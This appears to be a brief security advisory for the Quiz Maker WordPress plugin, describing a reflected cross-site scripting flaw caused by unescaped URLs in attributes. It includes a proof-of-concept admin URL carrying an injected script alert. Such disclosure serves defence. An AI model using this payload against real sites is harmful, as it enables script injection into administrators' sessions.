Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting
Visit the following URL:
https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E=something